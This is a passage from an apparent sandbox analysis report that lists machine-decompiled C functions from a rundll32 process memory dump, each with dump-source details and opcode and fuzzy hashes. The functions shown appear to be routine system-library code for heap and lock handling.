                                                                                                                				intOrPtr _t25;
                                                                                                                				signed short _t38;
                                                                                                                				signed short* _t42;
                                                                                                                				signed int _t44;
                                                                                                                				signed short* _t52;
                                                                                                                				signed short _t53;
                                                                                                                				signed int _t54;
                                                                                                                
                                                                                                                				_v8 =  *0x44fd360 ^ _t54;
                                                                                                                				_t42 = __ecx;
                                                                                                                				_t44 =  *__ecx & 0x0000ffff;
                                                                                                                				_t52 =  &(__ecx[2]);
                                                                                                                				_t51 = _t44 + 2;
                                                                                                                				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
                                                                                                                					L4:
                                                                                                                					_t25 =  *0x44f7b9c; // 0x0
                                                                                                                					_t53 = L04424620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
                                                                                                                					__eflags = _t53;
                                                                                                                					if(_t53 == 0) {
                                                                                                                						L3:
                                                                                                                						return E0444B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
                                                                                                                					} else {
                                                                                                                						E0444F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
                                                                                                                						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                                                						L2:
                                                                                                                						_t51 = 4;
                                                                                                                						if(L04416C59(_t53, _t51, _t58) != 0) {
                                                                                                                							_t28 = E04435E50(0x43ec338, 0, 0,  &_v32);
                                                                                                                							__eflags = _t28;
                                                                                                                							if(_t28 == 0) {
                                                                                                                								_t38 = ( *_t42 & 0x0000ffff) + 2;
                                                                                                                								__eflags = _t38;
                                                                                                                								_v24 = _t53;
                                                                                                                								_v16 = _t38;
                                                                                                                								_v20 = 0;
                                                                                                                								_v12 = 0;
                                                                                                                								E0443B230(_v32, _v28, 0x43ec2d8, 1,  &_v24);
                                                                                                                								_t28 = E0440F7A0(_v32, _v28);
                                                                                                                							}
                                                                                                                							__eflags = _t53 -  *_t52;
                                                                                                                							if(_t53 !=  *_t52) {
                                                                                                                								_t28 = L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                                                                                                							}
                                                                                                                						}
                                                                                                                						goto L3;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t53 =  *_t52;
                                                                                                                				_t44 = _t44 >> 1;
                                                                                                                				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
                                                                                                                				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
                                                                                                                					goto L4;
                                                                                                                				}
                                                                                                                				goto L2;
                                                                                                                			}





















                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: cfac41ccabe482a48f531285ffe1ca05725c0a20e21a8c552ad4ce7162d02076
                                                                                                                • Instruction ID: f841b930273246a9d69847458aa2d50423bd36644fd6e5c528546879d408d3d5
                                                                                                                • Opcode Fuzzy Hash: cfac41ccabe482a48f531285ffe1ca05725c0a20e21a8c552ad4ce7162d02076
                                                                                                                • Instruction Fuzzy Hash: AC31B171A00229ABDF109F65CD42A7FB7B8EF48704B05406AF901E7281E778B921DBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 93%
                                                                                                                			E04448EC7(void* __ecx, void* __edx) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int* _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				signed int* _v24;
                                                                                                                				char* _v28;
                                                                                                                				signed int* _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				signed int* _v40;
                                                                                                                				signed int* _v44;
                                                                                                                				signed int* _v48;
                                                                                                                				intOrPtr _v52;
                                                                                                                				signed int* _v56;
                                                                                                                				signed int* _v60;
                                                                                                                				signed int* _v64;
                                                                                                                				intOrPtr _v68;
                                                                                                                				signed int* _v72;
                                                                                                                				char* _v76;
                                                                                                                				signed int* _v80;
                                                                                                                				signed int _v84;
                                                                                                                				signed int* _v88;
                                                                                                                				intOrPtr _v92;
                                                                                                                				signed int* _v96;
                                                                                                                				intOrPtr _v100;
                                                                                                                				signed int* _v104;
                                                                                                                				signed int* _v108;
                                                                                                                				char _v140;
                                                                                                                				signed int _v144;
                                                                                                                				signed int _v148;
                                                                                                                				signed int* _v152;
                                                                                                                				char _v156;
                                                                                                                				signed int* _v160;
                                                                                                                				char _v164;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* _t67;
                                                                                                                				intOrPtr _t70;
                                                                                                                				void* _t71;
                                                                                                                				void* _t72;
                                                                                                                				signed int _t73;
                                                                                                                
                                                                                                                				_t69 = __edx;
                                                                                                                				_v8 =  *0x44fd360 ^ _t73;
                                                                                                                				_t48 =  *[fs:0x30];
                                                                                                                				_t72 = __edx;
                                                                                                                				_t71 = __ecx;
                                                                                                                				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
                                                                                                                					_t48 = E04434E70(0x44f86e4, 0x4449490, 0, 0);
                                                                                                                					if( *0x44f53e8 > 5 && E04448F33(0x44f53e8, 0, 0x2000) != 0) {
                                                                                                                						_v156 =  *((intOrPtr*)(_t71 + 0x44));
                                                                                                                						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
                                                                                                                						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
                                                                                                                						_v164 =  *((intOrPtr*)(_t72 + 0x58));
                                                                                                                						_v108 =  &_v84;
                                                                                                                						_v92 =  *((intOrPtr*)(_t71 + 0x28));
                                                                                                                						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
                                                                                                                						_v76 =  &_v156;
                                                                                                                						_t70 = 8;
                                                                                                                						_v60 =  &_v144;
                                                                                                                						_t67 = 4;
                                                                                                                						_v44 =  &_v148;
                                                                                                                						_v152 = 0;
                                                                                                                						_v160 = 0;
                                                                                                                						_v104 = 0;
                                                                                                                						_v100 = 2;
                                                                                                                						_v96 = 0;
                                                                                                                						_v88 = 0;
                                                                                                                						_v80 = 0;
                                                                                                                						_v72 = 0;
                                                                                                                						_v68 = _t70;
                                                                                                                						_v64 = 0;
                                                                                                                						_v56 = 0;
                                                                                                                						_v52 = 0x44f53e8;
                                                                                                                						_v48 = 0;
                                                                                                                						_v40 = 0;
                                                                                                                						_v36 = 0x44f53e8;
                                                                                                                						_v32 = 0;
                                                                                                                						_v28 =  &_v164;
                                                                                                                						_v24 = 0;
                                                                                                                						_v20 = _t70;
                                                                                                                						_v16 = 0;
                                                                                                                						_t69 = 0x43ebc46;
                                                                                                                						_t48 = E04487B9C(0x44f53e8, 0x43ebc46, _t67, 0x44f53e8, _t70,  &_v140);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return E0444B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
                                                                                                                			}


                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a100b7304f2166ecdfaf6c32918726619ed33bfa8783976f6e3c3e16bd36c31c
                                                                                                                • Instruction ID: 781d568ea878b7af332e01fb1400b4c75d234f903f9c664e52e93f7d65537ebf
                                                                                                                • Opcode Fuzzy Hash: a100b7304f2166ecdfaf6c32918726619ed33bfa8783976f6e3c3e16bd36c31c
                                                                                                                • Instruction Fuzzy Hash: F941A4B5D002189FEB10DFAAD981AADFBF4FB48714F50416FE509A7241DB746A44CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 58%
                                                                                                                			E04444A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int* _v12;
                                                                                                                				char _v13;
                                                                                                                				signed int _v16;
                                                                                                                				char _v21;
                                                                                                                				signed int* _v24;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t29;
                                                                                                                				signed int* _t32;
                                                                                                                				signed int* _t41;
                                                                                                                				signed int _t42;
                                                                                                                				void* _t43;
                                                                                                                				intOrPtr* _t51;
                                                                                                                				void* _t52;
                                                                                                                				signed int _t53;
                                                                                                                				signed int _t58;
                                                                                                                				void* _t59;
                                                                                                                				signed int _t60;
                                                                                                                				signed int _t62;
                                                                                                                
                                                                                                                				_t49 = __edx;
                                                                                                                				_t62 = (_t60 & 0xfffffff8) - 0xc;
                                                                                                                				_t26 =  *0x44fd360 ^ _t62;
                                                                                                                				_v8 =  *0x44fd360 ^ _t62;
                                                                                                                				_t41 = __ecx;
                                                                                                                				_t51 = __edx;
                                                                                                                				_v12 = __ecx;
                                                                                                                				if(_a4 == 0) {
                                                                                                                					if(_a8 != 0) {
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					_v13 = 1;
                                                                                                                					E04422280(_t26, 0x44f8608);
                                                                                                                					_t58 =  *_t41;
                                                                                                                					if(_t58 == 0) {
                                                                                                                						L11:
                                                                                                                						E0441FFB0(_t41, _t51, 0x44f8608);
                                                                                                                						L2:
                                                                                                                						 *0x44fb1e0(_a4, _a8);
                                                                                                                						_t42 =  *_t51();
                                                                                                                						if(_t42 == 0) {
                                                                                                                							_t29 = 0;
                                                                                                                							L5:
                                                                                                                							_pop(_t52);
                                                                                                                							_pop(_t59);
                                                                                                                							_pop(_t43);
                                                                                                                							return E0444B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
                                                                                                                						}
                                                                                                                						 *((intOrPtr*)(_t42 + 0x34)) = 1;
                                                                                                                						if(_v21 != 0) {
                                                                                                                							_t53 = 0;
                                                                                                                							E04422280(_t28, 0x44f8608);
                                                                                                                							_t32 = _v24;
                                                                                                                							if( *_t32 == _t58) {
                                                                                                                								 *_t32 = _t42;
                                                                                                                								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
                                                                                                                								if(_t58 != 0) {
                                                                                                                									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
                                                                                                                									asm("sbb edi, edi");
                                                                                                                									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
                                                                                                                								}
                                                                                                                							}
                                                                                                                							E0441FFB0(_t42, _t53, 0x44f8608);
                                                                                                                							if(_t53 != 0) {
                                                                                                                								L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t29 = _t42;
                                                                                                                						goto L5;
                                                                                                                					}
                                                                                                                					if( *((char*)(_t58 + 0x40)) != 0) {
                                                                                                                						L10:
                                                                                                                						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
                                                                                                                						E0441FFB0(_t41, _t51, 0x44f8608);
                                                                                                                						_t29 = _t58;
                                                                                                                						goto L5;
                                                                                                                					}
                                                                                                                					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                                                                                                					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                                                                                                						goto L11;
                                                                                                                					}
                                                                                                                					goto L10;
                                                                                                                				}
                                                                                                                				L1:
                                                                                                                				_v13 = 0;
                                                                                                                				_t58 = 0;
                                                                                                                				goto L2;
                                                                                                                			}


                                                                                                                0x04444acb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04444acb
                                                                                                                0x04444a53
                                                                                                                0x04444a53
                                                                                                                0x04444a58
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2d0116914e3d88419acacba6db13c1b6db195c802820211daa1c6fab90a726e2
                                                                                                                • Instruction ID: f939503230ed9666fb8c48ec209183699d15d25aa90f03c42affc490f2d03021
                                                                                                                • Opcode Fuzzy Hash: 2d0116914e3d88419acacba6db13c1b6db195c802820211daa1c6fab90a726e2
                                                                                                                • Instruction Fuzzy Hash: DD31EF323056509BFF21AE54CD40B2BF7A4FBC0714F50092BEA561B281DBB0F805CB96
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 74%
                                                                                                                			E0443E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                                                                                                                				intOrPtr* _v0;
                                                                                                                				signed char _v4;
                                                                                                                				signed int _v8;
                                                                                                                				void* __ecx;
                                                                                                                				void* __ebp;
                                                                                                                				void* _t37;
                                                                                                                				intOrPtr _t38;
                                                                                                                				signed int _t44;
                                                                                                                				signed char _t52;
                                                                                                                				void* _t54;
                                                                                                                				intOrPtr* _t56;
                                                                                                                				void* _t58;
                                                                                                                				char* _t59;
                                                                                                                				signed int _t62;
                                                                                                                
                                                                                                                				_t58 = __edx;
                                                                                                                				_push(0);
                                                                                                                				_push(4);
                                                                                                                				_push( &_v8);
                                                                                                                				_push(0x24);
                                                                                                                				_push(0xffffffff);
                                                                                                                				if(E04449670() < 0) {
                                                                                                                					L0445DF30(_t54, _t58, _t35);
                                                                                                                					asm("int3");
                                                                                                                					asm("int3");
                                                                                                                					asm("int3");
                                                                                                                					asm("int3");
                                                                                                                					asm("int3");
                                                                                                                					asm("int3");
                                                                                                                					_push(_t54);
                                                                                                                					_t52 = _v4;
                                                                                                                					if(_t52 > 8) {
                                                                                                                						_t37 = 0xc0000078;
                                                                                                                					} else {
                                                                                                                						_t38 =  *0x44f7b9c; // 0x0
                                                                                                                						_t62 = _t52 & 0x000000ff;
                                                                                                                						_t59 = L04424620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                                                                                                                						if(_t59 == 0) {
                                                                                                                							_t37 = 0xc0000017;
                                                                                                                						} else {
                                                                                                                							_t56 = _v0;
                                                                                                                							 *(_t59 + 1) = _t52;
                                                                                                                							 *_t59 = 1;
                                                                                                                							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
                                                                                                                							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                                                                                                                							_t44 = _t62 - 1;
                                                                                                                							if(_t44 <= 7) {
                                                                                                                								switch( *((intOrPtr*)(_t44 * 4 +  &M0443E810))) {
                                                                                                                									case 0:
                                                                                                                										L6:
                                                                                                                										 *((intOrPtr*)(_t59 + 8)) = _a8;
                                                                                                                										goto L7;
                                                                                                                									case 1:
                                                                                                                										L13:
                                                                                                                										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                                                                                                                										goto L6;
                                                                                                                									case 2:
                                                                                                                										L12:
                                                                                                                										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                                                                                                                										goto L13;
                                                                                                                									case 3:
                                                                                                                										L11:
                                                                                                                										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                                                                                                                										goto L12;
                                                                                                                									case 4:
                                                                                                                										L10:
                                                                                                                										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                                                                                                                										goto L11;
                                                                                                                									case 5:
                                                                                                                										L9:
                                                                                                                										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                                                                                                                										goto L10;
                                                                                                                									case 6:
                                                                                                                										L17:
                                                                                                                										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                                                                                                                										goto L9;
                                                                                                                									case 7:
                                                                                                                										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                                                                                                                										goto L17;
                                                                                                                								}
                                                                                                                							}
                                                                                                                							L7:
                                                                                                                							 *_a40 = _t59;
                                                                                                                							_t37 = 0;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					return _t37;
                                                                                                                				} else {
                                                                                                                					_push(0x20);
                                                                                                                					asm("ror eax, cl");
                                                                                                                					return _a4 ^ _v8;
                                                                                                                				}
                                                                                                                			}


















                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c39f6587a8b21a7cc35c0ca83f6850b1e702eb5051219bf67d9052dc7996563d
                                                                                                                • Instruction ID: 76a910d9cbad4aa69c2e71aeb921153792fc34dd15afe06981bb803025cb0b96
                                                                                                                • Opcode Fuzzy Hash: c39f6587a8b21a7cc35c0ca83f6850b1e702eb5051219bf67d9052dc7996563d
                                                                                                                • Instruction Fuzzy Hash: 13318C75A14249EFEB44CF69C840B9AB7E8FB09714F14825AF904CB341E635ED80CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 67%
                                                                                                                			E0443BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				intOrPtr _t22;
                                                                                                                				intOrPtr* _t41;
                                                                                                                				intOrPtr _t51;
                                                                                                                
                                                                                                                				_t51 =  *0x44f6100; // 0x48
                                                                                                                				_v12 = __edx;
                                                                                                                				_v8 = __ecx;
                                                                                                                				if(_t51 >= 0x800) {
                                                                                                                					L12:
                                                                                                                					return 0;
                                                                                                                				} else {
                                                                                                                					goto L1;
                                                                                                                				}
                                                                                                                				while(1) {
                                                                                                                					L1:
                                                                                                                					_t22 = _t51;
                                                                                                                					asm("lock cmpxchg [ecx], edx");
                                                                                                                					if(_t51 == _t22) {
                                                                                                                						break;
                                                                                                                					}
                                                                                                                					_t51 = _t22;
                                                                                                                					if(_t22 < 0x800) {
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                					goto L12;
                                                                                                                				}
                                                                                                                				E04422280(0xd, 0x158cf1a0);
                                                                                                                				_t41 =  *0x44f60f8; // 0x0
                                                                                                                				if(_t41 != 0) {
                                                                                                                					 *0x44f60f8 =  *_t41;
                                                                                                                					 *0x44f60fc =  *0x44f60fc + 0xffff;
                                                                                                                				}
                                                                                                                				E0441FFB0(_t41, 0x800, 0x158cf1a0);
                                                                                                                				if(_t41 != 0) {
                                                                                                                					L6:
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsd");
                                                                                                                					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                                                                                                                					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
                                                                                                                					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                                                                                                                					do {
                                                                                                                						asm("lock xadd [0x44f60f0], ax");
                                                                                                                						 *((short*)(_t41 + 0x34)) = 1;
                                                                                                                					} while (1 == 0);
                                                                                                                					goto L8;
                                                                                                                				} else {
                                                                                                                					_t41 = L04424620(0x44f6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                                                                                                                					if(_t41 == 0) {
                                                                                                                						L11:
                                                                                                                						asm("lock dec dword [0x44f6100]");
                                                                                                                						L8:
                                                                                                                						return _t41;
                                                                                                                					}
                                                                                                                					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                                                                                                                					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                                                                                                                					if(_t41 == 0) {
                                                                                                                						goto L11;
                                                                                                                					}
                                                                                                                					goto L6;
                                                                                                                				}
                                                                                                                			}











                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: da85bb140666683ce110da1dffb49775961bb77425af25fded508758e3b48b9c
                                                                                                                • Instruction ID: 20d052f95633bb5ec058795a809316deb72a551b0ba61699d39fab6652ab820d
                                                                                                                • Opcode Fuzzy Hash: da85bb140666683ce110da1dffb49775961bb77425af25fded508758e3b48b9c
                                                                                                                • Instruction Fuzzy Hash: 613101326006959FEF21DF58D4807A673A4FB08716F15407AED48DB302EB79FD068B90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 60%
                                                                                                                			E04431DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                                                                                				char _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				intOrPtr* _v20;
                                                                                                                				void* _t22;
                                                                                                                				char _t23;
                                                                                                                				void* _t36;
                                                                                                                				intOrPtr _t42;
                                                                                                                				intOrPtr _t43;
                                                                                                                
                                                                                                                				_v12 = __ecx;
                                                                                                                				_t43 = 0;
                                                                                                                				_v20 = __edx;
                                                                                                                				_t42 =  *__edx;
                                                                                                                				 *__edx = 0;
                                                                                                                				_v16 = _t42;
                                                                                                                				_push( &_v8);
                                                                                                                				_push(0);
                                                                                                                				_push(0);
                                                                                                                				_push(6);
                                                                                                                				_push(0);
                                                                                                                				_push(__ecx);
                                                                                                                				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
                                                                                                                				_push(_t36);
                                                                                                                				_t22 = E0442F460();
                                                                                                                				if(_t22 < 0) {
                                                                                                                					if(_t22 == 0xc0000023) {
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					L3:
                                                                                                                					return _t43;
                                                                                                                				}
                                                                                                                				L1:
                                                                                                                				_t23 = _v8;
                                                                                                                				if(_t23 != 0) {
                                                                                                                					_t38 = _a4;
                                                                                                                					if(_t23 >  *_a4) {
                                                                                                                						_t42 = L04424620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
                                                                                                                						if(_t42 == 0) {
                                                                                                                							goto L3;
                                                                                                                						}
                                                                                                                						_t23 = _v8;
                                                                                                                					}
                                                                                                                					_push( &_v8);
                                                                                                                					_push(_t23);
                                                                                                                					_push(_t42);
                                                                                                                					_push(6);
                                                                                                                					_push(_t43);
                                                                                                                					_push(_v12);
                                                                                                                					_push(_t36);
                                                                                                                					if(E0442F460() < 0) {
                                                                                                                						if(_t42 != 0 && _t42 != _v16) {
                                                                                                                							L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
                                                                                                                						}
                                                                                                                						goto L3;
                                                                                                                					}
                                                                                                                					 *_v20 = _t42;
                                                                                                                					 *_a4 = _v8;
                                                                                                                				}
                                                                                                                				_t43 = 1;
                                                                                                                				goto L3;
                                                                                                                			}













                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                                                • Instruction ID: ec92fd12c2c57d36782bdf63d18da98fc235cb8ce6bbfc7a96ed39149b14781c
                                                                                                                • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                                                • Instruction Fuzzy Hash: F821B531600118FFEB20CF5ACD81EABBBBDEF89B45F514056E50597610DA35BE01DB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 76%
                                                                                                                			E04409100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                                                                                                                				signed int _t53;
                                                                                                                				signed int _t56;
                                                                                                                				signed int* _t60;
                                                                                                                				signed int _t63;
                                                                                                                				signed int _t66;
                                                                                                                				signed int _t69;
                                                                                                                				void* _t70;
                                                                                                                				intOrPtr* _t72;
                                                                                                                				void* _t78;
                                                                                                                				void* _t79;
                                                                                                                				signed int _t80;
                                                                                                                				intOrPtr _t82;
                                                                                                                				void* _t85;
                                                                                                                				void* _t88;
                                                                                                                				void* _t89;
                                                                                                                
                                                                                                                				_t84 = __esi;
                                                                                                                				_t70 = __ecx;
                                                                                                                				_t68 = __ebx;
                                                                                                                				_push(0x2c);
                                                                                                                				_push(0x44df6e8);
                                                                                                                				E0445D0E8(__ebx, __edi, __esi);
                                                                                                                				 *((char*)(_t85 - 0x1d)) = 0;
                                                                                                                				_t82 =  *((intOrPtr*)(_t85 + 8));
                                                                                                                				if(_t82 == 0) {
                                                                                                                					L4:
                                                                                                                					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                                                                                                                						E044D88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                                                                                                                					}
                                                                                                                					L5:
                                                                                                                					return E0445D130(_t68, _t82, _t84);
                                                                                                                				}
                                                                                                                				_t88 = _t82 -  *0x44f86c0; // 0x3507b0
                                                                                                                				if(_t88 == 0) {
                                                                                                                					goto L4;
                                                                                                                				}
                                                                                                                				_t89 = _t82 -  *0x44f86b8; // 0x0
                                                                                                                				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                                                                                					goto L4;
                                                                                                                				} else {
                                                                                                                					E04422280(_t82 + 0xe0, _t82 + 0xe0);
                                                                                                                					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                                                                                                                					__eflags =  *((char*)(_t82 + 0xe5));
                                                                                                                					if(__eflags != 0) {
                                                                                                                						E044D88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                                                                                                                						goto L12;
                                                                                                                					} else {
                                                                                                                						__eflags =  *((char*)(_t82 + 0xe4));
                                                                                                                						if( *((char*)(_t82 + 0xe4)) == 0) {
                                                                                                                							 *((char*)(_t82 + 0xe4)) = 1;
                                                                                                                							_push(_t82);
                                                                                                                							_push( *((intOrPtr*)(_t82 + 0x24)));
                                                                                                                							E0444AFD0();
                                                                                                                						}
                                                                                                                						while(1) {
                                                                                                                							_t60 = _t82 + 8;
                                                                                                                							 *(_t85 - 0x2c) = _t60;
                                                                                                                							_t68 =  *_t60;
                                                                                                                							_t80 = _t60[1];
                                                                                                                							 *(_t85 - 0x28) = _t68;
                                                                                                                							 *(_t85 - 0x24) = _t80;
                                                                                                                							while(1) {
                                                                                                                								L10:
                                                                                                                								__eflags = _t80;
                                                                                                                								if(_t80 == 0) {
                                                                                                                									break;
                                                                                                                								}
                                                                                                                								_t84 = _t68;
                                                                                                                								 *(_t85 - 0x30) = _t80;
                                                                                                                								 *(_t85 - 0x24) = _t80 - 1;
                                                                                                                								asm("lock cmpxchg8b [edi]");
                                                                                                                								_t68 = _t84;
                                                                                                                								 *(_t85 - 0x28) = _t68;
                                                                                                                								 *(_t85 - 0x24) = _t80;
                                                                                                                								__eflags = _t68 - _t84;
                                                                                                                								_t82 =  *((intOrPtr*)(_t85 + 8));
                                                                                                                								if(_t68 != _t84) {
                                                                                                                									continue;
